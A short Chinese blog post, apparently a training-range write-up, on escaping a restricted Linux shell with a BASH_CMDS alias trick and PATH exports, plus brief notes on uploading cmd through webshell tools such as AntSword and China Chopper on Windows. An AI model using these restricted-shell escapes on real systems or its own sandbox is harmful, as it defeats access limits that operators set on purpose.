今天的靶場登陸ssh后發現shell受限,如下
woami都執行不了,查看對應的bin目錄,發現只能執行4個命令

在網上學到一招可以繞過這種受限制的被閹割的shell
BASH_CMDS[a]=/bin/sh;a #把/bin/bash給a變數
/bin/bash
echo $0 #查看腳本本身的名字
echo $? #命令執行結果反饋,0代表執行成功,其余數字表示不成功
export PATH=$PATH:/bin/ #將/bin 作為PATH環境變數匯出
export PATH=$PATH:/usr/bin #將/usr/bin作為PATH環境變數匯出
執行完上面加粗的四步之后就可以執行所有命令了
Windows中如果遇到此類情形
1.找到一處可上傳檔案的位置上傳cmd

2.蟻劍可以自定義cmd的環境變數

使用菜刀同樣上傳cmd檔案
設定cmd環境變數 終端輸入 set cmd檔案的物理地址
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/43359.html
標籤:其他
下一篇:阿里云搭建蜜罐之hfish
